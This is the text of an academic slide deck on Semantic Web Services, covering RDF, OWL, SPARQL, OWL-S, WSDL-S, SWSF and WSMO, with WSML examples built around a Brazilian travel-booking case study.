- Only syntactic information descriptions, and syntactic support for discovery, composition and execution
  => *Web service reuse and integration needs to be done manually*
- No semantic markup for contents / services
  => *The current Web service technology stack has failed to realize the promise of Web services*

The Semantic Web

"*The Semantic Web is an extension of the current Web in which information is given well-defined meaning, better enabling computers and people to work in cooperation.*"

Means:
- Standards for representing data and metadata
- Semantic descriptions attached to data and services
- Reasoning (e.g., inference) based on semantic descriptions

Ontology in Philosophy

- **From Greek:** ontos = being, logos = science
- A **shared understanding** of some domain of interest, which:
  - Is conceived as a set of concepts (e.g., entities, attributes, processes), their definitions and inter-relationships
  - Is referred to as a conceptualization
  - May be used as a unifying framework for solving problems such as communication and interoperability
  - Entails some sort of world view [with respect to a given domain]
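What a machine gains from such a conceptualization can be sketched in a few lines (the concept names and IS_A links below are a toy example, not from any real ontology): even a minimal ontology supports an inference that a flat list of terms cannot, namely transitive subsumption along IS_A links.

```python
# Toy conceptualization: each concept names its direct IS_A parent.
is_a = {
    "Model":   "Person",
    "Student": "Person",
    "Person":  "Agent",
}

def subsumes(general, specific):
    """True if `specific` IS_A `general`, following IS_A links transitively."""
    while specific is not None:
        if specific == general:
            return True
        specific = is_a.get(specific)   # climb one level; None at the root
    return False

assert subsumes("Agent", "Student")      # Student IS_A Person IS_A Agent
assert not subsumes("Model", "Student")  # siblings do not subsume each other
```

This is exactly the kind of reasoning step that lets a semantic search for "Agent" resources also return instances classified only as "Student".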
Ontologies in Computer Science

- **Shared conceptualizations** of a domain
- **Explicit** and **formal**, to enable their use by machines
- Can have different forms:
  - **Thesaurus** with the semantic relationships between terms (e.g., synonym, hyponym (IS_A), meronym (PART_OF))
  - **Taxonomy**
  - **Class Diagram**
  - **Knowledge Base**
    - Classes, properties and their relationships
    - Instances of classes

Ontology Example – Trip

Applications

- **Accurate search of resources**
  - E.g.: Student(Mary), Model(Mary), Saint(Mary)
- **Interoperability**
- **Intelligent agents**
- **Reuse and composition of resources**
- **Semantically enabled services & workflows**

Semantic Web Standards (2006)

[Figure: the Semantic Web layer cake — User Interface & Applications; Trust; Proof; Unifying Logic; Ontology: OWL / Rule: RIF / Query: SPARQL; RDF-S; RDF; XML; URI/IRI]

Semantic Heterogeneity in XML

```xml
<object id="a1" class="artifact">
  <tuple>
    <title>Nymphes</title>
    <year>1897</year>
    <creator>Monet</creator>
    <price>10,000,000</price>
    <owners refs="p1,p2,p3"/>
  </tuple>
</object>
<object id="p3" class="person">
  <tuple>
    <name>Claudia</name>
    <age>17</age>
  </tuple>
</object>
```

```xml
<work>
  <artist>Monet</artist>
  <name>Nymphes</name>
  <style>Impressionist</style>
  <size>21 x 61</size>
  <cplace>Givern</cplace>
</work>
<work>
  <artist>Monet</artist>
  <title>Waterloo Bridge</title>
  <style>Impressionist</style>
  <size>29.2 x 46.4</size>
  <history> Painted with <tech>Oil on canvas</tech> in... </history>
</work>
```

XML as a Standard Data Model

[Figure: mapping the heterogeneous "Artifact" schema (ODMG model: classes and types V = int ∨ bool ∨ float ∨ string) and the "Artworks" structure (YAT tree: &YAT, V, Any; artifacts: set of &Artifact tuples referencing &Person) onto a common data model]

RDF – Resource Description Framework

A standard language & model for expressing semantics on the Semantic Web.
An RDF statement is a triple of the form:
- **Resource**: anything that has a URI
- **Property**: any property of the resource
- **Value**: a literal or another resource

RDF-Schema defines the classes of resources, the possible properties for each class of resource, and the possible values for these properties.

The proposed standard formats for representing ontologies on the Semantic Web (e.g., DAML+OIL, OWL) are extensions of RDF.

RDF's XML Syntax

```xml
<?xml version="1.0"?>
<rdf:RDF xmlns:rdf="http://www.w3.org/RDF/RDF/"
    xmlns:dc="http://dublincore.org/dc">
  <rdf:Description about="http://www.nbi.cnptia.embrapa.br">
    <dc:name>Núcleo de Bioinformática</dc:name>
    <leader rdf:resource="http://www.cbi.cnptia.embrapa.br/~neshich"/>
  </rdf:Description>
  <rdf:Description about="http://www.nbi.cnptia.embrapa.br/~neshich">
    <dc:name>Goran Neshich</dc:name>
    <title>Dr.</title>
    <dc:email>neshich@cnptia.embrapa.br</dc:email>
  </rdf:Description>
</rdf:RDF>
```

RDF graph-like structure

Metadata in RDF

Water balance (same place and institution):

```xml
<?xml version="1.0"?>
<rdf:RDF xmlns:rdf="http://www.w3.org/RDF/RDF/"
    xmlns="http://agric.gov.br/DocStd/">
  <rdf:Description about="http://www.agric.gov.br/public/WaterBal1234">
    <Source rdf:resource="http://www.cepagri.unicamp.br"/>
    <Source rdf:resource="http://www.ciagro.iac.gov.sp.br"/>
    <InitialDate>28/03/2002</InitialDate>
    <FinalDate>31/03/2002</FinalDate>
    <keyword>Water available in Soil</keyword>
    <local rdf:resource="http://www.ibge.gov.br/state_SP"/>
    <measurement_unit rdf:resource="http://www.inmetro.gov.br/mm"/>
  </rdf:Description>
</rdf:RDF>
```

```xml
<rdf:Property rdf:about="&AgricZoning;countryOfState"
    a:maxCardinality="1" a:minCardinality="1"
    rdfs:label="countryOfState">
  <rdfs:domain rdf:resource="&AgricZoning;State"/>
  <rdfs:range rdf:resource="&AgricZoning;Country"/>
  <a:inverseProperty rdf:resource="&AgricZoning;statesOfCountry"/>
</rdf:Property>
```

RDF-Schema

<RDF-Schema> <rdf:Property
rdf:about="&AgricZoning;statesOfCountry" a:minCardinality="1" rdfs:label="statesOfCountry"> <rdfs:domain rdf:resource="&AgricZoning;Country"/> <rdfs:range rdf:resource="&AgricZoning;State"/> <a:inverseProperty rdf:resource="&AgricZoning;countryOfState"/> </rdf:Property> </RDF-Schema>

One RDF instance

```xml
<AgricZoning:Country rdf:about="&AgricZoning;pais_55"
    AgricZoning:nameBR="BRASIL" rdfs:label="BRASIL">
  <AgricZoning:officialRegionsOfCountry rdf:resource="&AgricZoning;regof_1"/>
  <AgricZoning:officialRegionsOfCountry rdf:resource="&AgricZoning;regof_2"/>
  <AgricZoning:officialRegionsOfCountry rdf:resource="&AgricZoning;regof_3"/>
  <AgricZoning:officialRegionsOfCountry rdf:resource="&AgricZoning;regof_4"/>
  <AgricZoning:officialRegionsOfCountry rdf:resource="&AgricZoning;regof_5"/>
  <AgricZoning:statesOfCountry rdf:resource="&AgricZoning;estado_11"/>
  <AgricZoning:statesOfCountry rdf:resource="&AgricZoning;estado_12"/>
  <AgricZoning:metroAreasOfCountry rdf:resource="&AgricZoning;metro_5201"/>
</AgricZoning:Country>
```

RDF-Schema to provide Alternative Knowledge Views

**OWL – Web Ontology Language**

- Extends RDF with standard vocabulary and constructs to define:
  - Local scope of properties
  - Disjointness of classes
  - Boolean combinations of classes
  - Cardinality restrictions
  - Special characteristics of properties (e.g., transitive properties, inverse properties)

**The 3 flavours of OWL**

- **OWL Lite**
  - Restricted expressiveness: excludes enumerated classes, disjointness statements, and arbitrary cardinality
  - Easier to grasp and implement
- **OWL DL**
  - Equivalent to Description Logics
  - Still permits efficient reasoning support
  - Every legal OWL DL document is a legal RDF document (but not the converse)
- **OWL Full**
  - Fully upward-compatible with RDF, both syntactically and semantically
  - Any valid RDF/RDF Schema conclusion is also a valid OWL Full conclusion
  - Undecidable

Disjointness and Equivalence of Classes

<owl:Class rdf:about="#associateProfessor">
<owl:disjointWith rdf:resource="#professor"/>
  <owl:disjointWith rdf:resource="#assistantProfessor"/>
</owl:Class>
<owl:Class rdf:ID="faculty">
  <owl:equivalentClass rdf:resource="#academicStaffMember"/>
</owl:Class>

Inverse properties

<owl:ObjectProperty rdf:ID="teaches">
  <rdfs:range rdf:resource="#course"/>
  <rdfs:domain rdf:resource="#academicStaffMember"/>
  <owl:inverseOf rdf:resource="#isTaughtBy"/>
</owl:ObjectProperty>

Abstract OWL Syntax

Class(Person partial restriction (hasChild allValuesFrom(Person)))
Class(Parent complete Person restriction (hasChild someValuesFrom(Person)))
ObjectProperty(hasChild)
Individual (John type(Person) value(hasChild Mary))

Rule Languages

Rules:
- father(?x, ?z) ∨ mother(?x, ?z) ⇒ parent(?x, ?z)
- parent(?x, ?z) ∧ parent(?y, ?z) ⇒ brother(?x, ?y)

Knowledge base:
- father(_Fileto, _Claudio)
- father(_Guiga, _Claudio)

Query:
- brother(_Fileto, ?b) ⇒ Yes !! ⇒ ?b = _Guiga ⇒ ?b = _xyz1, _xyz2, _xyz3, _xyz4, ...

SPARQL

W3C recommendation for querying RDF repositories

Example of a SPARQL expression:

```sparql
SELECT ?concept ?property
WHERE {
  ?concept ?property "Mary" .
  FILTER regex(str(?property), "name")
}
```

Research Challenges in the Semantic Web

- **Ontology Creation and Management**
  - (Semi)-Automated Ontology Building (+)
  - (Semi)-Automated Semantic Annotation (+)
  - (Semi)-Automated Ontology Evolution (+/-)
  - Reasoning with Inconsistent Ontologies (-)
  - Ontology Mapping, Mediation and Alignment (+)
- **Ontology Use**
  - Ontologies for Knowledge Management (+/-)
  - Semantic IR / Search (++)
  - Semantic Web Services (++ -> future)
- **Tools and Applications (++)**

Topics

- Introduction
- Web Services (WS)
- Semantic Web (SW)
- **Semantic Web Services (SWS)**
- Some Major Efforts towards SWS
  - WSDL-S
  - OWL-S
  - SWSF (SWSO + SWSL)
  - WSMO (WSMO + WSML + WSMX)
- **Software Tools**: WSMT, WSMX, IRS-III, ...
- **Case study**: Travelling to SBBD

Semantic Web & Web Services

The SWS Vision

- The WWW (URI, HTML, HTTP): huge in terms of users and information available, and ubiquitous
- Deficiencies in automated information processing:
  - finding
  - extraction
  - representation
  - interpretation
  - maintenance

[Figure: the SWS vision, shown as a static/dynamic × syntactic/semantic matrix]

|  | Syntactic | Semantic |
| --- | --- | --- |
| **Static** | WWW (URI, HTML, HTTP) | Semantic Web (RDF, RDF(S), OWL) |
| **Dynamic** | Web Services (UDDI, WSDL, SOAP): enable computing over the Web | Semantic Web Services: automated Web services, bringing the Web to its full potential |

Semantic description of Web Services

- Should describe all information necessary to enable automated discovery, composition, execution, etc.
- Semantically enhanced repositories
- Tools and platforms that:
  - semantically enrich current Web content
  - facilitate discovery, composition and execution

Semantic Web Services

- define exhaustive description frameworks for describing Web services and related aspects (Web service description ontologies)
- support ontologies as the underlying data model, to allow machine-supported interpretation of Web data (Semantic Web aspect)
- define semantically driven technologies for automation of the Web service usage process (Web service aspect)

What (partial) automation should SWS provide?
- **Publication**: make available the description of the capability of a service
- **Discovery**: locate different services suitable for a given task
- **Selection**: choose the most appropriate services among the available ones
- **Composition**: combine services to achieve a goal
- **Mediation**: solve mismatches (data, protocol, process) among the combined services
- **Execution**: invoke services following programmatic conventions
- **Monitoring**: control the execution process
- **Compensation**: provide transactional support and undo or mitigate unwanted effects
- **Replacement**: facilitate the substitution of services by equivalent ones

Topics

- **Introduction**
- **Web Services (WS)**
- **Semantic Web (SW)**
- **Semantic Web Services (SWS)**
- **Some Major Efforts towards SWS**
  - WSDL-S
  - OWL-S
  - SWSF (SWSO + SWSL)
  - WSMO (WSMO + WSML + WSMX)
- **Software Tools**: WSMT, WSMX, IRS-III, ...
- **Case study**: Travelling to SBBD

Some Major SWS Proposals

- **WSDL-S**: extends **WS** technology with semantic descriptions
- **OWL-S**: extends **OWL** for semantically describing **WS**
- **SWSF (SWSO + SWSL)**: roots in **OWL-S** and **PSL** (Process Specification Language)
- **WSMO (WSMO + WSML + WSMX)**: ontologies, Web services, **goals**, and **mediators**

WSDL-S

- Rather **minimalist and lightweight** approach that extends **WSDL** service descriptions with semantics
- Has its roots in the METEOR-S project, led by **Amit Sheth** at LSDIS, Athens, Georgia
- The semantic model is kept outside WSDL-S, making it agnostic to the ontology representation language
- Builds upon and stays close to existing industry standards, promoting an upwardly compatible mechanism for adding semantics to Web services
- Support for annotating XML Schema datatypes needs to be added to XML Schema
- Originated **SAWSDL** (Semantic Annotations for WSDL), a W3C Recommendation, in cooperation with IBM

**OWL-S**

OWL-S is an OWL ontology to describe Web services.
OWL-S builds on OWL to:
- Support capability-based discovery of Web services
- Support automatic composition of Web services
- Support automatic invocation of Web services

"Complete, do not compete"
- OWL-S does not aim to replace the Web services standards; rather, OWL-S attempts to provide a semantic layer
- OWL-S relies on WSDL for Web service invocation (see Grounding)
- OWL-S extends UDDI for Web service discovery (OWL-S/UDDI mapping)

OWL-S Upper Ontology

- Mapping to WSDL
  - communication protocol (RPC, HTTP, ...)
  - marshalling/serialization
  - transformation between XSD and OWL
- Capability specification
- General features of the service
  - Quality of service
  - Classification in service taxonomies
- Control flow of the service
  - Black/grey/glass-box view
  - Protocol specification
  - Abstract messages

Service Profiles

- Service Profile
  - Presented by a service
  - Represents what the service provides
- Two main uses:
  1. Advertisement of Web service capabilities (non-functional properties, QoS, description, classification, etc.)
  2. Request of Web services with a given set of capabilities
- The Profile does not specify use/invocation!

OWL-S Service Profile

Capability Description

- **Preconditions**: set of conditions that should hold prior to service invocation
- **Inputs**: set of necessary inputs that the requester should provide to invoke the service
- **Outputs**: results that the requester should expect after interaction with the service provider is completed
- **Effects**: set of statements that should hold true if the service is invoked successfully
- **Service type**: what kind of service is provided (e.g., selling vs. distribution)
- **Product**: product associated with the service (e.g., travel vs.
books vs. auto parts)

---

Process Model

- **Process Model**
  - Describes how a service works: the internal processes of the service
  - Specifies the service interaction protocol
  - Specifies abstract messages: the ontological type of the information transmitted
- **Facilitates**
  - Web service invocation
  - Composition of Web services
  - Monitoring of interaction

**Definition of Process**

A Process represents a transformation (function). It is characterized by four parameters:

- **Inputs**: the inputs that the process requires
- **Preconditions**: the conditions that are required for the process to run correctly
- **Outputs**: the information that results from (and is returned by) the execution of the process
- **Results**: a process may have different outcomes depending on some condition
  - **Condition**: under what condition the result occurs
  - **Constraints on outputs**
  - **Effects**: real-world changes resulting from the execution of the process

**Example of an atomic Process**

```xml
<process:AtomicProcess rdf:ID="LogIn">
  <process:hasInput rdf:resource="#AcctName"/>
  <process:hasInput rdf:resource="#Password"/>
  <process:hasOutput rdf:resource="#Ack"/>
  <process:hasPrecondition isMember(AccName)/>
  <process:hasResult>
    <process:inCondition>
      <expr:SWRL-Condition>
        correctLoginInfo(AccName,Password)
      </expr:SWRL-Condition>
    </process:inCondition>
    <process:withOutput rdf:resource="#Ack"/>
    <valueType rdf:resource="#LoginAcceptMsg"/>
  </process:hasResult>
  <process:hasEffect>
    <expr:SWRL-Condition>
      loggedIn(AccName,Password)
    </expr:SWRL-Condition>
    <process:withOutput rdf:resource="#Ack"/>
    <valueType rdf:resource="#LoginAcceptMsg"/>
  </process:hasEffect>
</process:AtomicProcess>
```

Ontology of Processes

Process Model Organization

- **The Process Model is described as a tree structure**
  - Composite processes are internal nodes
  - Simple and atomic processes are the leaves
- **Simple processes represent an abstraction**
  - Placeholders for processes that aren't specified
  - Or that may be expressed in many
different ways
- **Atomic processes correspond to the basic actions that the Web service performs**
  - Hide the details of how the process is implemented
  - Correspond to WSDL operations
- Related to process definition languages such as BPEL

Composite Processes

- Composite processes specify how processes work together to compute a complex function
- Composite processes define
  1. **Control flow**: specifies the temporal relations between the executions of the different sub-processes (sequence, choice, etc.)
  2. **Data flow**: specifies how the data produced by one process is transferred to another process

Service Grounding

- Service Grounding
  - Provides a specification of service access information
  - Service Model + Grounding give everything needed for using the service
- Builds upon **WSDL** to define message structure and the physical binding layer
- Specifies: communication protocols, transport mechanisms, communication languages, etc.

Mapping OWL-S / WSDL 1.1

- **Operations** correspond to Atomic Processes
- **Input/Output messages** correspond to the Inputs/Outputs of processes

Result of using the Grounding

- **Invocation mechanism for OWL-S**
  - Invocation based on WSDL
  - The different types of invocation supported by WSDL can be used with OWL-S
- **Clear separation between service description and invocation/implementation**
  - The service description is needed to reason about the service
    - Decide how to use it
    - Decide what information to send and what to expect
  - The service implementation may be based on SOAP and XSD types
  - The crucial point is that the information that travels on the wire and the information used in the ontologies is the same
- **Allows any Web service to be represented using OWL-S**

SWSF – Semantic Web Services Framework (SWSO + SWSL)

- Based on OWL-S and PSL (Process Specification Language)
- Richer behavioural process model based on PSL
- Two major components:
  - a conceptual model to specify ontologies, called SWSO, and
  - a richer language, called SWSL
- Two
variants of SWSL:
  - SWSL-FOL, based on FLOWS (First-Order Logic Ontology for Web Services)
  - SWSL-Rules, based on ROWS (Rule Ontology for Web Services)
- Submitted to W3C in 2005
- Builds on PSL, which is standardized as ISO 18629

FLOWS Extensions based on PSL

- Exceptions
- Control constraints
- Occurrence constraints
- Ordering constraints
- State constraints
- FLOWS Core
- PSL Outer Core

WSMO

- WSMO is an ontology and conceptual framework to describe Web services and related aspects
- Based on the Web Service Modeling Framework (WSMF)
- WSMO is developed by an SDK-Cluster working group

The WSMO approach for SWS

- A conceptual model for SWS
- A formal language for WSMO
- An execution environment for WSMO

**WSMO Principles**

- **Web Compliance**: XML, URI (IRI), namespaces, but not necessarily RDF/S, OWL, ...
- **Ontology-based & Role Separation**: users exist in different contexts
- **Strict Decoupling & Strong Mediation**: autonomous components with mediators for interoperability
- **Interface vs. Implementation**: distinguish interface (= description) from implementation (= program) - WSML
- **Execution Semantics**: WSMX
- **Services vs. Web Services**
  - A **Web service** is a computational entity which is able to achieve a user's goal by invocation (e.g., sell books, sell air tickets)
  - A **service** is the actual value provided by this invocation

---

**WSMO model in MOF**

- M3 layer: MOF meta-meta-model
- M2 layer: WSMO meta-model
- M1 layer: WSMO descriptions (model)
- M0 layer: concrete Web services information

WSMO Top Level Concepts

- **Goals**: objectives that a client may have when consulting a Web service
- **Ontologies**: provide the formally specified terminology of the information used by all other components
- **Mediators**: connectors between components, with mediation facilities for handling heterogeneities
- **Web Services**: semantic descriptions of Web services

Non-Functional Properties

- Every WSMO element is described by properties that contain relevant, non-functional aspects of the item
- used for management and element
overall description
- Core Properties:
  - Dublin Core Metadata Element Set plus version (evolution support)
  - W3C recommendations for description type
- Web Service Specific Properties:
  - quality aspects and other non-functional information of Web services
  - used for service selection

Non-Functional Properties

```
ontology
  np
    do#title hasValue "WSML example ontology"
    do#subject hasValue "family"
    do#description hasValue "fragments of a family ontology to provide WSML examples"
    do#contributor hasValue {
      _"http://homepage.uibk.ac.at/~c703240/foaf.rdf",
      _"http://homepage.uibk.ac.at/~csaa5569/",
      _"http://homepage.uibk.ac.at/~c703239/foaf.rdf",
      _"http://homepage.uibk.ac.at/homepage/~c703319/foaf.rdf" }
    do#date hasValue date("2004-11-22")
    do#format hasValue "text/plain"
    do#language hasValue "en-US"
    do#rights hasValue _"http://www.deri.org/privacy.html"
    wsml#version hasValue "$Revision: 1.13 $"
  end
```

WSMO Ontologies

- **Ontologies**: provide the formally specified terminology of the information used by all other components
- **Goals**: objectives that a client may have when consulting a Web service
- **Mediators**: connectors between components, with mediation facilities for handling heterogeneities
- **Web Services**: semantic description of Web services

Ontology Example

Ontology class

```
Class ontology
  hasNonFunctionalProperty type nonFunctionalProperty
  importsOntology type ontology
  usesMediator type ooMediator
  hasConcept type concept
  hasRelation type relation
  hasFunction type function
  hasInstance type instance
  hasAxiom type axiom
```

Ontology header

wsmlVariant _"http://www.wsmo.org/wsml/wsml-syntax/wsml-flight"
namespace { _"http://www.inf.ufsc.br/~frank/travel/domainOntology#",
  dc _"http://purl.org/dc/elements/1.1#",
  wsml _"http://www.wsmo.org/wsml/wsml-syntax#" }
ontology _"http://www.inf.ufsc.br/~frank/travel/domainOntology.wsml"
  nonFunctionalProperties
    dc#date hasValue _date(2008,10,8)
    dc#format hasValue "text/plain"
    dc#contributor hasValue {"Frank Siqueira", "Adina Sirbu", "Renato Fileto"}
    dc#title hasValue {"SBBD Travel Ontology", "Travel
Ontology"}
    dc#language hasValue "en-US"
  endNonFunctionalProperties

Concepts and relations

concept Country subConceptOf Region
  name ofType _string
  capital impliesType (0 1) City
concept City subConceptOf Region
  name ofType _string
  country ofType Country
concept BrazilCity subConceptOf City
concept Ticket
  from ofType Region
  to ofType Region
  vehicle ofType Vehicle

Concepts and relations (cont.)

concept Place
  isInCity impliesType (0 1) City
concept Airport subConceptOf Place
concept BusStation subConceptOf Place
concept TrainStation subConceptOf Place
concept PersonsHome subConceptOf Place
concept UniversityCampus subConceptOf Place

Instances

instance Brazil memberOf Country
  name hasValue "Brazil"
  capital hasValue Brasilia
instance SP memberOf BrazilState
  name hasValue "São Paulo"
  country hasValue Brazil
instance Brasilia memberOf BrazilCity
  name hasValue "Brasília"
  country hasValue Brazil

**Instances (cont.)**

instance UNICAMP-BaraoGeraldo memberOf UniversityCampus
  isInCity hasValue Campinas
instance UFSC_Trindade memberOf UniversityCampus
  isInCity hasValue Florianopolis
instance HercilioLuz memberOf Airport
  isInCity hasValue Florianopolis
instance Viracopos memberOf Airport
  isInCity hasValue Campinas
instance Congonhas memberOf Airport
  isInCity hasValue SaoPaulo
instance FrancoMontoro memberOf Airport
  isInCity hasValue Guarulhos

**Axioms**

axiom **UKCityDef** definedBy
  ?city memberOf UKCity implies ?city[country hasValue UK]
axiom **BrazilCityDef** definedBy
  ?city memberOf BrazilCity implies ?city[country hasValue Brazil]

**WSMO Goals**

- **Goals**: objectives that a client may have when consulting a Web service
- **Web Services**: semantic description of Web services: **capability** (functional) and **interfaces** (usage)
- **Ontologies**: provide the formally specified terminology of the information used by all other components
- **Mediators**: connectors between components with mediation facilities
for handling heterogeneities

**Goal class**

Class goal
  hasNonFunctionalProperty type nonFunctionalProperty
  importsOntology type ontology
  usesMediator type {ooMediator, ggMediator}
  requestsCapability type capability multiplicity = single-valued
  requestsInterface type interface

Goals

- **De-coupling of request and service**
- **Goal-driven approach**, derived from the AI rational agent approach
  - The requester formulates an objective independently, without regard to the services used for its resolution
  - 'Intelligent' mechanisms detect suitable services for solving the goal
  - Allows re-use of goals
- **Usage of goals within Semantic Web Services**
  - A requester, that is, an agent (human or machine), defines a goal to be resolved
  - Web service discovery automatically detects suitable Web services for solving the goal
  - Goal resolution management is realized in implementations

Goal Example

```
wsmlVariant _"http://www.wsmo.org/wsml/wsml-syntax/wsml-flight"
namespace { _"http://www.inf.ufsc.br/~frank/travel/goalFloripaCampinasSBBD2008#",
  dO _"http://www.inf.ufsc.br/~frank/travel/domainOntology#",
  dc _"http://purl.org/dc/elements/1.1#" }

/* Test Goal */
goal _"http://www.inf.ufsc.br/~frank/travel/goalFloripaCampinasSBBD2008.wsml"
  nfp
    dc#title hasValue "Goal"
    dc#contributor hasValue "Frank Siqueira, Renato Fileto"
    dc#description hasValue "Buying a ticket from Floripa to Campinas"
  endnfp

importsOntology _"http://www.inf.ufsc.br/~frank/travel/domainOntology.wsml"
```

Goal Example (cont)

```
capability goalCapability
  postcondition definedBy
    ?ticket[
      dO#from hasValue ?from,
      dO#to hasValue ?to,
      dO#vehicle hasValue ?vehicle
    ] memberOf dO#Ticket
    and ?from = dO#Florianopolis
    and ?to = dO#Campinas.
```

WSMO Web Services

- **Goals**: objectives that a client may have when consulting a Web service
- **Web Services**: semantic description of Web services: capability (functional) and interfaces (usage)
- **Ontologies**: provide the formally specified terminology of the information used by all other components
- **Mediators**: connectors between components, with mediation facilities for handling heterogeneities

WSMO Service Class

Class service
  hasNonFunctionalProperty type nonFunctionalProperty
  importsOntology type ontology
  usesMediator type {ooMediator, wwMediator}
  hasCapability type capability multiplicity = single-valued
  hasInterface type interface

WSMO Web Service

[Figure: a WSMO Web service description comprises non-functional properties (core + WS-specific, for complete item description, quality aspects and Web service management), a capability (functional description), and interfaces — choreography, the interaction interface for consuming the WS (messages, externally visible behavior, 'grounding'), and orchestration, the realization of the WS by using other Web services (functional decomposition, WS composition); the Web service implementation itself is not of interest for the Web service description]

Web Service specific Properties

- Non-functional information of Web services:
  - Accuracy
  - Availability
  - Financial
  - Network-related QoS
  - Performance
  - Reliability
  - Robustness
  - Scalability
  - Security
  - Transactional
  - Trust

Web Service Example

wsmlVariant _"http://www.wsmo.org/wsml/wsml-syntax/wsml-flight"
namespace { _"http://www.inf.ufsc.br/~frank/travel/webServiceBrazilAir#",
  do _"http://www.inf.ufsc.br/~frank/travel/domainOntology#",
  dc _"http://purl.org/dc/elements/1.1#"}

webService _"http://www.inf.ufsc.br/~frank/travel/webServiceBrazilAir.wsml"
  nonFunctionalProperties
    dc#description hasValue "Booking plane tickets within Brazil"
    dc#contributor hasValue "Frank Siqueira"
    dc#title hasValue "Brazil Air"
  endNonFunctionalProperties

importsOntology
_"http://www.inf.ufsc.br/~frank/travel/domainOntology.wsml"

Web Service Example (cont.)

capability webServiceBrazilAirCapability
  postcondition definedBy
    ?ticket[ do#from hasValue ?from,
             do#to hasValue ?to,
             do#vehicle hasValue ?vehicle ] memberOf do#Ticket
    and ?from memberOf do#BrazilCity
    and ?to memberOf do#BrazilCity
    and ?vehicle memberOf do#Airplane

Goal-Services Matchmaking
- **Service**: provision of value for some domain
- **Abstract service**: collection of services offered by a provider
- **Goal**: specification of the client needs
  - *E.g.: Booking air tickets from Floripa to Campinas and booking a room in a hotel in Campinas without carpet*
- **Concrete services**: what the provider requires for accessing its services
  - *E.g.: Person's name, features of the flight, features of the hotel room (maybe a picture)*
- **Web service**: entity using standard interfaces that allow clients to interact with a provider, in order to explore and consume concrete services

Heuristic Classification

(Figure: findings are abstracted into abstracted findings; abstracted findings are matched to abstracted diagnoses; abstracted diagnoses are refined into a diagnosis.)

Services Discovery Process

Possible kinds of matching (between a Goal and a Web service):
- Exact Match
- Plugin Match
- Subsumption Match
- Intersection Match
- Non Match

Ontological Coverage (Fileto et al. 2003)

(Figure: fragments of agricultural ontologies — an institutional hierarchy (Consortium(RNA), Institution(Embrapa), Institution(Unicamp), Unit(CPAC), Unit(CNPTIA), Unit(CEPAGRI), ...), a product hierarchy (Product, Grain, Coffee (Robusta, Arabica, Variety(tupi)), Rice, Fruit, Orange (Pera, Variety(JAC-2000)), Mango, ...), and a geographic hierarchy (Country(Brazil), Region(NE), Region(S), Region(SE), State(MG), State(RJ), State(SP), ...). Example coverages: [ Cons(RNA).Inst(Embrapa), Plant.Fruit.Orange, Country(Brazil).Region(SE) ] and [ Plant.Grain, Country(Brazil).Region(SE) ].)

Relating Ontological Coverages for Web Services

Discovering Services providing data about the production of coffee in the Brazilian South-East?
(Figure: example ontological coverages — [ Plant, Country(Brazil) ], [ Plant, Country(Brazil).Region(SE) ], [ Plant, Country(Brazil).Region(NE) ], [ Plant, Country(Brazil).State(MG) ], [ Plant, Country(Brazil).State(SP) ], [ Plant, Country(Brazil).State(RJ) ] — associated with Web Service 1 through Web Service 5, ...)

Formal Relationships between Ontological Coverages

Let OC = [ t₁, t₂, …, tₙ ] and OC′ = [ t′₁, t′₂, …, t′ₙ ] be ontological coverages, where tᵢ, t′ᵢ are terms from the same ontology.

- **Overlapping** (reflexive, symmetric)
  - For all t in OC there exists t′ in OC′ such that t encompasses t′ OR t′ encompasses t
  - For all t′ in OC′ there exists t in OC such that t encompasses t′ OR t′ encompasses t
- **Encompassing** (reflexive, transitive)
  - For all t in OC there exists t′ in OC′ such that t encompasses t′
  - For all t′ in OC′ there exists t in OC such that t encompasses t′
- **Equivalence** (reflexive, symmetric, transitive)
  - For all t in OC there exists t′ in OC′ such that t encompasses t′
  - For all t′ in OC′ there exists t in OC such that t′ encompasses t

WSMO Capabilities/Interfaces
- **Requested/provided:**
  - **Capability** (functional)
  - **Interfaces** (usage)

Objectives that a client may have when consulting a Web Service

Provide the formally specified terminology of the information used by all other components

Connectors between components with mediation facilities addressing heterogeneities

Semantic description of Web Services: Capability Specification
- **Non-functional properties**
- **Imported Ontologies**
- **Used mediators**
  - OO Mediator: importing ontologies as terminology definition
  - WG Mediator: link to a Goal that is solved by the Web Service
- **Pre-conditions** What a web service expects in order to be able to provide its service. They define conditions over the input.
- **Assumptions** Conditions on the state of the world that have to hold before the Web Service can be executed and work correctly, but are not necessarily checked/checkable.
- **Post-conditions** describe the result of the Web Service in relation to the input, and conditions on it.
- **Effects** Conditions on the state of the world that hold after execution of the Web Service (i.e. changes in the state of the world)

---

Web Service Interfaces

(Figure: example interfaces of a ticket-selling Web Service. The choreography exchanges messages with the client — a request (buyer information, itinerary); responses such as "input not valid", "no valid connection", or a set of valid itineraries; itinerary selection and a purchase proposition; option selection OR accept OR not accept; a request for payment information; "payment information incorrect" or, on normal payment information, a successful purchase. The orchestration coordinates internal components — TimeTable, Composition, Payment, Delivery — through invocation, connection choice, contract of purchase, and payment & delivery.)

Choreography in WSMO

"Interface of Web Service for client-service interaction when consuming the Web Service"
- **External Visible Behavior**
  - those aspects of the workflow of a Web Service where User Interaction is required
  - described by process / workflow constructs
- **Communication Structure**
  - messages sent and received
  - their order (messages are related to activities)

---

Choreography in WSMO (2)
- **Grounding**
  - concrete communication technology for interaction
  - choreography related errors (e.g. input wrong, message timeout, etc.)
- **Formal Model**
  - allows operations on / mediation of Choreographies
  - Formal basis: Abstract State Machines (ASM) — a very generic description of a transition system over evolving ontologies

WSMO Orchestration

"Achieve Web Service functionality by aggregation of other Web Services"
- Decomposition of the Web Service functionality into sub-functionalities
- Proxies: Goals as placeholders for used Web Services
- **Orchestration Language**
  - decomposition of Web Service functionality
  - control structure for aggregation of Web Services
- **Web Service Composition**
  - Combine Web Services into higher-level functionality
  - Resolve mismatches occurring between composed Web Services
- **Proxy Technology**
  - Placeholders for used Web Services or goals, linked via Mediators
  - Facility for applying the Choreography of used Web Services; service templates for composed services

(Figure: choreography & orchestration example.)

WSMO Mediators

Objectives that a client may have when consulting a Web Service

Provide the formally specified terminology of the information used by all other components

Semantic description of Web Services:
- Capability (functional)
- Interfaces (usage)

Mediators: connectors between components with mediation facilities for handling heterogeneities

Mediation
- Heterogeneity ...
- Mismatches on the structural / semantic / conceptual level
  - Occur between different components that shall interoperate
  - Especially in distributed & open environments like the Internet
- Concept of Mediation (Wiederhold, 1994):
  - Mediators as components that resolve mismatches
  - Declarative Approach:
    - Semantic description of resources
    - 'Intelligent' mechanisms that resolve mismatches independent of content
  - Mediation cannot be fully automated (integration decision)
- Levels of Mediation within Semantic Web Services (WSMF):
